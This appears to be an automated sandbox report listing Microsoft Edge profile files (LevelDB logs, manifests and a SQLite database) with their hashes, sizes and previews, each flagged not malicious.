                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):311
                                                                                                                                                                                                                                                                          Entropy (8bit):5.19991781773578
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BOhm81N723oH+Tcwtp3hBtB2KLl3Ohq+q2PN723oH+Tcwtp3hBWsIFUv:Bv8aYebp3dFLpf+vVaYebp3eFUv
                                                                                                                                                                                                                                                                          MD5:85E2F7B86158BC795E1D18C728907752
                                                                                                                                                                                                                                                                          SHA1:4CAB7048400DB7E2F8A03E1E9E1C5D5D1F4F403E
                                                                                                                                                                                                                                                                          SHA-256:B952032F735F2D5D9F6BA98B3534BCB09B0DA958B0818228563FEAC670B224D6
                                                                                                                                                                                                                                                                          SHA-512:C450E89066B40E3F8F2B3144DE93CF579CBF2F9C4C342876A0B6F2B7AB2B89C7B64C0AA160857C2570D3D6CA853DF4FEDCC41430661F676838A192AE1F429E8E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:10.313 40c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-01:11:10.329 40c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):340
                                                                                                                                                                                                                                                                          Entropy (8bit):5.033853032397704
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BOhsVN9+q2PN723oH+Tcwt9Eh1tIFUt8UOhFJZmw+UOhtuv9VkwON723oH+TcwtY:BL3+vVaYeb9Eh16FUt8UE/+Ugu1V5Oaw
                                                                                                                                                                                                                                                                          MD5:39765BDBEA904B259C84B53721C25974
                                                                                                                                                                                                                                                                          SHA1:D9E4ED9D255DD576B1E71FAF39501795ADD330D4
                                                                                                                                                                                                                                                                          SHA-256:14B1DF548DD8294748C132FF133A3DCA6ED5C1391E694947EBF27CC27DF4865E
                                                                                                                                                                                                                                                                          SHA-512:541821AF22871AAD8834740BB3594E82D4BF4B4C2E9BA1F4F1C9128806FCBA8720685B5D580D7E6763E7146084CD26BE32E0DA666CDB634F18F322B67EBAA299
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:10.189 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-01:11:10.193 1e2c Recovering log #3.2024/12/27-01:11:10.202 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):340
                                                                                                                                                                                                                                                                          Entropy (8bit):5.033853032397704
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BOhsVN9+q2PN723oH+Tcwt9Eh1tIFUt8UOhFJZmw+UOhtuv9VkwON723oH+TcwtY:BL3+vVaYeb9Eh16FUt8UE/+Ugu1V5Oaw
                                                                                                                                                                                                                                                                          MD5:39765BDBEA904B259C84B53721C25974
                                                                                                                                                                                                                                                                          SHA1:D9E4ED9D255DD576B1E71FAF39501795ADD330D4
                                                                                                                                                                                                                                                                          SHA-256:14B1DF548DD8294748C132FF133A3DCA6ED5C1391E694947EBF27CC27DF4865E
                                                                                                                                                                                                                                                                          SHA-512:541821AF22871AAD8834740BB3594E82D4BF4B4C2E9BA1F4F1C9128806FCBA8720685B5D580D7E6763E7146084CD26BE32E0DA666CDB634F18F322B67EBAA299
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:10.189 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-01:11:10.193 1e2c Recovering log #3.2024/12/27-01:11:10.202 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                          Entropy (8bit):0.46246861730411365
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuHW:TouQq3qh7z3bY2LNW9WMcUvBuH
                                                                                                                                                                                                                                                                          MD5:CFC9886903D5A6AE7BA50ACA3610EC2F
                                                                                                                                                                                                                                                                          SHA1:6820B58448EC3BACB4342438B298C46C0FE7E738
                                                                                                                                                                                                                                                                          SHA-256:233C342982382CB076C4818B565D49821F5150D3424F429BC3E1C05A09A5159C
                                                                                                                                                                                                                                                                          SHA-512:5B7402DFF13CBD68DE058512562300CD413C86D80F275022D0F6A16E3D3C74703A03FA962EC8C8BD5FEF543021419D34D5180A83E3A68FD45B7999428756D624
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):349
                                                                                                                                                                                                                                                                          Entropy (8bit):5.149268109921384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BIyq2PN723oH+TcwtnG2tMsIFUt8UB1Zmw+UXRkwON723oH+TcwtnG2tMsLJ:BtvVaYebn9GFUt8UB1/+UB5OaYebn95J
                                                                                                                                                                                                                                                                          MD5:A26096860C818A35761B17CCF4037961
                                                                                                                                                                                                                                                                          SHA1:9124E292313D6E75E1FF78BE1BE3A5BD598EF4AB
                                                                                                                                                                                                                                                                          SHA-256:E9D58381151DA0A72892A2D4F04153A32A331ABD321CC271241FB78399B59182
                                                                                                                                                                                                                                                                          SHA-512:34D88C2FAF9CEAA21CB1F166370C455A7E7C22D4833DDFD18E8205D2CC55E6CD98AA082A2DBDCFAFC8B433914F6C959D141BAA759048461C05584D8D3050E26A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.993 a14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-01:11:04.994 a14 Recovering log #3.2024/12/27-01:11:04.994 a14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):349
                                                                                                                                                                                                                                                                          Entropy (8bit):5.149268109921384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BIyq2PN723oH+TcwtnG2tMsIFUt8UB1Zmw+UXRkwON723oH+TcwtnG2tMsLJ:BtvVaYebn9GFUt8UB1/+UB5OaYebn95J
                                                                                                                                                                                                                                                                          MD5:A26096860C818A35761B17CCF4037961
                                                                                                                                                                                                                                                                          SHA1:9124E292313D6E75E1FF78BE1BE3A5BD598EF4AB
                                                                                                                                                                                                                                                                          SHA-256:E9D58381151DA0A72892A2D4F04153A32A331ABD321CC271241FB78399B59182
                                                                                                                                                                                                                                                                          SHA-512:34D88C2FAF9CEAA21CB1F166370C455A7E7C22D4833DDFD18E8205D2CC55E6CD98AA082A2DBDCFAFC8B433914F6C959D141BAA759048461C05584D8D3050E26A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.993 a14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-01:11:04.994 a14 Recovering log #3.2024/12/27-01:11:04.994 a14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):315
                                                                                                                                                                                                                                                                          Entropy (8bit):5.095083296422052
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BOhAm3M1N723oH+Tcwtk2WwnvB2KLl3OhhEIq2PN723oH+Tcwtk2WwnvIFUv:BA3saYebkxwnvFLp0EIvVaYebkxwnQF2
                                                                                                                                                                                                                                                                          MD5:2B4B8210762A0209C977C33BDE3B2F2A
                                                                                                                                                                                                                                                                          SHA1:B933A2922D3AB452AD5C6D432A654D47244B6DEF
                                                                                                                                                                                                                                                                          SHA-256:15A3E6DD85B0F8FE7CD389E7AE992A0AAF910AE25BAA44E6BA67FE2913F20FFB
                                                                                                                                                                                                                                                                          SHA-512:70EC114015061A3B613B7A383CC20E5FEFE580BCBDD40C1C1338D916FAD240D51CD24CE774576E3FF46766465C5FE9F569E49F5016EEF824E29982A8AC301FFE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:10.187 1a94 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-01:11:10.242 1a94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):380
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                          MD5:9FE07A071FDA31327FA322B32FCA0B7E
                                                                                                                                                                                                                                                                          SHA1:A3E0BAE8853A163C9BB55F68616C795AAAF462E8
                                                                                                                                                                                                                                                                          SHA-256:E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
                                                                                                                                                                                                                                                                          SHA-512:9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                          Entropy (8bit):5.144980134523914
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BHiW3+q2PN723oH+Tcwt8aPrqIFUt8UHyZmw+UHQVhFNVkwON723oH+Tcwt8amLJ:BHiWOvVaYebL3FUt8UHy/+UHgz5OaYeo
                                                                                                                                                                                                                                                                          MD5:F42A822B7104CEF479F08C3F9F9D6E96
                                                                                                                                                                                                                                                                          SHA1:67B9086C0B9421CD515E8335399828FF6DB99BE6
                                                                                                                                                                                                                                                                          SHA-256:21DC40F90E7DD32DDAA7960B9B7930C0CFF3CB1230383B3220273A9B844D36FE
                                                                                                                                                                                                                                                                          SHA-512:F6A7FCED9A3A06BBA87711AC052F3357C584CB489B2A79A2735943A9F598BDAFC18735F958EA948745031615D6B018065EE15971CFD27240A2396FCF3BDE3BE0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.848 1388 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-01:11:04.849 1388 Recovering log #3.2024/12/27-01:11:04.850 1388 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                          Entropy (8bit):5.144980134523914
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BHiW3+q2PN723oH+Tcwt8aPrqIFUt8UHyZmw+UHQVhFNVkwON723oH+Tcwt8amLJ:BHiWOvVaYebL3FUt8UHy/+UHgz5OaYeo
                                                                                                                                                                                                                                                                          MD5:F42A822B7104CEF479F08C3F9F9D6E96
                                                                                                                                                                                                                                                                          SHA1:67B9086C0B9421CD515E8335399828FF6DB99BE6
                                                                                                                                                                                                                                                                          SHA-256:21DC40F90E7DD32DDAA7960B9B7930C0CFF3CB1230383B3220273A9B844D36FE
                                                                                                                                                                                                                                                                          SHA-512:F6A7FCED9A3A06BBA87711AC052F3357C584CB489B2A79A2735943A9F598BDAFC18735F958EA948745031615D6B018065EE15971CFD27240A2396FCF3BDE3BE0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.848 1388 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-01:11:04.849 1388 Recovering log #3.2024/12/27-01:11:04.850 1388 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):380
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                          MD5:9FE07A071FDA31327FA322B32FCA0B7E
                                                                                                                                                                                                                                                                          SHA1:A3E0BAE8853A163C9BB55F68616C795AAAF462E8
                                                                                                                                                                                                                                                                          SHA-256:E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
                                                                                                                                                                                                                                                                          SHA-512:9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                          Entropy (8bit):5.1484986706342655
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BHQds3+q2PN723oH+Tcwt865IFUt8UHQ0qZmw+UHQ0GVkwON723oH+Tcwt86+ULJ:BHcvVaYeb/WFUt8UHO/+UHi5OaYeb/+e
                                                                                                                                                                                                                                                                          MD5:2EFD749BB8FEC298CF6FC992E101A0D3
                                                                                                                                                                                                                                                                          SHA1:A26C840C65FEB9C729E182CC79E83688DE8DD386
                                                                                                                                                                                                                                                                          SHA-256:8E2E735474AFD3624ECD73BD473D44380190F6A88BA8F1E5E06996B908C301F7
                                                                                                                                                                                                                                                                          SHA-512:98C2B608806516C7849D9F439FF8F8C928A14ECDC698FED894382EDB368B38BCE52B8F6DF98F10831744775F79A7FCCC7FA39E9B9ED065A953676990304A8313
                                                                                                                                                                                                                                                                          Malicious:false
